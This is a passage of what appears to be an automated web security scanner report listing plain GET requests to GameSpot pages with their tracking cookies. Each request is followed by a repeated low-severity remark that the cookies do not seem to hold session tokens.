GET /games.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /iphone/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/aboutus.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/helpcenter.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/rss/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/worldwide.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mobile/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newthisweek.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/common/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/forums/post_msg.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/forums/show_msgs.php?topic_id=26182411 HTTP/1.1 Host: www.gamespot.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/forums/show_topics.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pc/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pc/rpg/worldofwarcraft/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pc/strategy/ageofempiresiii/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps2/action/grandtheftautovicecity/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps2/action/gta4/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps2/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/action/grandtheftauto4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps3/action/uncharted3drakesdeception/video/6285796 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/driving/granturismo52/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps3/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /psp/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reviews.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup/raptr/upgrade.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/6258426 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videos/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii/action/smb/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox/action/gta4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/callofduty7workingtitle/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xbox360/action/grandtheftautoivtheballadofgaytony/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/reddeadredemption/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/saintsrow/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
